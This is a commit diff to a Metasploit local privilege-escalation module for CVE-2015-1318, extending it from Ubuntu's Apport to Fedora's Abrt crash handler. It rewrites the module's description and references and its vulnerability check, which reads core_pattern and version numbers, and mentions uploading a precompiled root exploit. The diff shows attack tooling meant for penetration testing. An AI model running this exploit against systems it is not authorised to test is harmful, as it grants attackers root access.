Add support for abrt on Fedora

bcoles · bcoles · commit c234d0523a93 · 2018-01-14T08:33:10.000Z
diff --git a/modules/exploits/linux/local/apport_chroot_priv_esc.rb b/modules/exploits/linux/local/apport_chroot_priv_esc.rb
@@ -12,19 +12,27 @@ class MetasploitModule < Msf::Exploit::Local
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Apport chroot Privilege Escalation',
+      'Name'           => 'Apport / Abrt chroot Privilege Escalation',
       'Description'    => %q{
-        This module attempts to gain root privileges on Ubuntu by invoking
-        the default coredump handler (Apport) inside a namespace ("container").
+        This module attempts to gain root privileges on Linux systems by
+        invoking the default coredump handler inside a namespace ("container").
 
         Apport versions 2.13 through 2.17.x before 2.17.1 on Ubuntu are
-        vulnerable (CVE-2015-1318), due to a feature which allows forwarding
-        reports to a container's Apport, causing usr/share/apport/apport
-        within the crashed task's directory to be executed. Apport does not
-        not drop privileges, resulting in code execution as root.
+        vulnerable, due to a feature which allows forwarding reports to
+        a container's Apport by changing the root directory before loading
+        the crash report, causing 'usr/share/apport/apport' within the crashed
+        task's directory to be executed.
 
-        This module has been tested successfully on Apport 2.14.1
-        on Ubuntu 14.04.1 LTS x86 and x86_64.
+        Similarly, Fedora is vulnerable when the kernel crash handler is
+        configured to change root directory before executing Abrt, causing
+        'usr/libexec/abrt-hook-ccpp' within the crashed task's directory to be
+        executed.
+
+        In both instances, the crash handler does not drop privileges,
+        resulting in code execution as root.
+
+        This module has been tested successfully on Apport 2.14.1 on
+        Ubuntu 14.04.1 LTS x86 and x86_64 and Abrt on Fedora 19 and 20 x86_64.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -35,18 +43,23 @@ def initialize(info = {})
           'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
         ],
       'DisclosureDate' => 'Mar 31 2015',
-      'Platform'       => [ 'linux'],
+      'Platform'       => [ 'linux' ],
       'Arch'           => [ ARCH_X86, ARCH_X64 ],
       'SessionTypes'   => [ 'shell', 'meterpreter' ],
       'Targets'        => [[ 'Auto', {} ]],
       'References'     =>
         [
-          [ 'EDB', '36782' ],
-          [ 'EDB', '36746' ],
           [ 'CVE', '2015-1318' ],
-          [ 'URL', 'https://usn.ubuntu.com/usn/USN-2569-1/' ],
           [ 'URL', 'http://www.openwall.com/lists/oss-security/2015/04/14/4' ],
+          # Exploits
+          [ 'EDB', '36782' ],
+          [ 'EDB', '36746' ],
           [ 'URL', 'https://gist.github.com/taviso/0f02c255c13c5c113406' ],
+          # Abrt (Fedora)
+          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211223' ],
+          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1211835' ],
+          # Apport (Ubuntu)
+          [ 'URL', 'https://usn.ubuntu.com/usn/USN-2569-1/' ],
           [ 'URL', 'https://code.launchpad.net/~stgraber/apport/pidns-support/+merge/200893' ],
           [ 'URL', 'https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758' ],
           [ 'URL', 'http://bazaar.launchpad.net/~apport-hackers/apport/trunk/revision/2943' ]
@@ -63,50 +76,53 @@ def base_dir
   end
 
   def check
-    res = cmd_exec 'apport-cli --version'
+    kernel_version = Gem::Version.new cmd_exec('uname -r').split('-').first
 
-    if res.blank?
-      vprint_error 'Apport is NOT installed'
+    if kernel_version < Gem::Version.new('3.12')
+      vprint_error "Linux kernel version #{kernel_version} is NOT vulnerable"
       return CheckCode::Safe
     end
 
-    apport_version = Gem::Version.new res
+    vprint_good "Linux kernel version #{kernel_version} is vulnerable"
 
-    if apport_version >= Gem::Version.new('2.13') && apport_version < Gem::Version.new('2.17.1')
-      vprint_good "Apport version #{apport_version} is vulnerable"
-    else
-      vprint_error "Apport version #{apport_version} is NOT vulnerable"
-      return CheckCode::Safe
+    kernel_core_pattern = cmd_exec 'cat /proc/sys/kernel/core_pattern'
+
+    # Vulnerable core_pattern (abrt):
+    #   kernel.core_pattern = |/usr/sbin/chroot /proc/%P/root /usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e
+    # Patched systems no longer preface the command with /usr/sbin/chroot
+    #   kernel.core_pattern = |/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e
+    if kernel_core_pattern.include?('chroot') && kernel_core_pattern.include?('abrt-hook-ccpp')
+      vprint_good 'System is configured to chroot Abrt for crash reporting'
+      return CheckCode::Vulnerable
     end
 
-    os = cmd_exec 'grep ^ID= /etc/os-release'
+    # Vulnerable core_pattern (apport):
+    #   kernel.core_pattern = |/usr/share/apport/apport %p %s %c %P
+    if kernel_core_pattern.include? 'apport'
+      vprint_good 'System is configured to use Apport for crash reporting'
 
-    if os.include? 'ID=ubuntu'
-      vprint_good 'Target operating system is Ubuntu'
-    else
-      vprint_error 'Target operating system is NOT supported'
-      return CheckCode::Safe
-    end
+      res = cmd_exec 'apport-cli --version'
 
-    kernel_version = Gem::Version.new cmd_exec 'uname -r'
+      if res.blank?
+        vprint_error 'Apport is NOT installed'
+        return CheckCode::Safe
+      end
 
-    if kernel_version >= Gem::Version.new('3.12')
-      vprint_good "Linux kernel version #{kernel_version} is vulnerable"
-    else
-      vprint_error "Linux kernel version #{kernel_version} is NOT vulnerable"
-      return CheckCode::Safe
-    end
+      apport_version = Gem::Version.new(res.split('-').first)
 
-    kernel_core_pattern = cmd_exec 'sysctl -a | grep core_pattern'
+      if apport_version >= Gem::Version.new('2.13') && apport_version < Gem::Version.new('2.17.1')
+        vprint_good "Apport version #{apport_version} is vulnerable"
+        return CheckCode::Vulnerable
+      end
+
+      vprint_error "Apport version #{apport_version} is NOT vulnerable"
 
-    if kernel_core_pattern.include? 'apport'
-      vprint_good 'System is configured to use Apport for crash reporting'
-    else
-      vprint_error 'System is NOT configured to use Apport for crash reporting'
       return CheckCode::Safe
     end
 
-    CheckCode::Vulnerable
+    vprint_error 'System is NOT configured to use Apport or chroot Abrt for crash reporting'
+
+    CheckCode::Safe
   end
 
   def upload_and_chmodx(path, data)
@@ -124,7 +140,7 @@ def exploit
 
     # Upload Tavis Ormandy's newpid exploit:
     # - https://www.exploit-db.com/exploits/36746/
-    # Cross-compiled with musl:
+    # Cross-compiled with:
     # - i486-linux-musl-cc -static newpid.c
     path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2015-1318', 'newpid'
     fd = ::File.open path, 'rb'
